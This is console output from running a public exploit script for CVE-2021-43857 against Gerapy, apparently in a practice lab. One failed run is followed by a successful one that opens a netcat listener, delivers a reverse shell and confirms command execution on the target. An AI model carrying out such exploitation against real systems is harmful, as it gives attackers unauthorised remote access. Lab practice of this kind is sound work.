Exploit for CVE-2021-43857 For: Gerapy < 0.9.8 [*] Resolving URL... [*] Logging in to application... [*] Login successful! Proceeding... [*] Getting the project list Traceback (most recent call last): File "/home/kali/Tools/pg/Levarm/50640.py", line 130, in <module> exp.exploitation() File "/home/kali/Tools/pg/Levarm/50640.py", line 76, in exploitation name = dict3[0]['name'] ~~~~~^^^ IndexError: list index out of range
Exploit for CVE-2021-43857 For: Gerapy < 0.9.8 [*] Resolving URL... [*] Logging in to application... [*] Login successful! Proceeding... [*] Getting the project list [*] Found project: test [*] Getting the ID of the project to build the URL [*] Found ID of the project:1 [*] Setting up a netcat listener listening on [any]80 ... [*] Executing reverse shell payload [*] Watchout for shell! :) connect to [192.168.45.184] from (UNKNOWN) [192.168.212.24]44652 bash: cannot set terminal process group (846): Inappropriate ioctl for device bash: no job control in this shell app@ubuntu:~/gerapy$ id id uid=1000(app) gid=1000(app) groups=1000(app)